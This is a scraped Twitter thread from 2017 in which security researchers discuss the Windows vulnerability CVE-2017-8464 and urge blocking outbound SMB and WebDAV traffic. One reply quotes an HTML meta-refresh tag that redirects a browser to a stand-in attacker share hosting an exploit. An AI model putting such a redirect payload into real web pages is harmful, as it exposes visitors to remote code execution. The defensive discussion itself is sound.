CVE-2017-8464 is one more reason to block outbound SMB traffic. But if you haven't by now, I question what it'd takehttps://www.kb.cert.org/vuls/id/824672
-
-
Replying to @wdormann
CVE-2017-8464 code execution happens *BEFORE* you answer the AutoPlay prompt for physical media. Or immediately upon visiting SMB share.pic.twitter.com/lgr7HcpL87
2 replies 6 retweets 17 likes -
Replying to @wdormann
And Microsoft makes it *really* easy to trigger people to visit a SMB share.pic.twitter.com/qOMNb8tEHA
2 replies 0 retweets 2 likes -
Replying to @wdormann
...and don't forget that even when SMB is blocked at your egress, WebDAV (think SMB over HTTP) still allows exploitation! thx
@yorickkoster1 reply 5 retweets 22 likes -
This Tweet is unavailable.
Replying to @4Dgifts @yorickkoster
<head><meta http-equiv="refresh" content="0;URL=\\attacker\exploit"></head> used to do it! I haven't seen an equivalent for modern IE though
10:08 AM - 4 Aug 2017
0 replies
0 retweets
0 likes
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.